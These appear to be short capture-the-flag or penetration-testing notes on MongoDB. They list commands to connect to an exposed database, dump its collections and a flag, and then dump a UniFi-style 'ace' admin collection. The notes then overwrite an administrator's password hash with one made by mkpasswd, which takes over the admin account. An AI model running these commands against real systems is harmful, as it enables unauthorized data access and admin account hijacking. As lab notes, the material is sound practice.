mongo $ip:27017

>help

>show dbs

>use $dbs

>  <location>.find() ||  db.flag.find().pretty()


================================|more.|
UPdate some data im mongodb
---------------------------

mongo --port 27117
use ace                    
db.admin.find()
OR 1=3>>       mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"`

|
 > mkpasswd -m sha-512 Password1234 
|
mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"SHA_512 Hash Generated"}})'

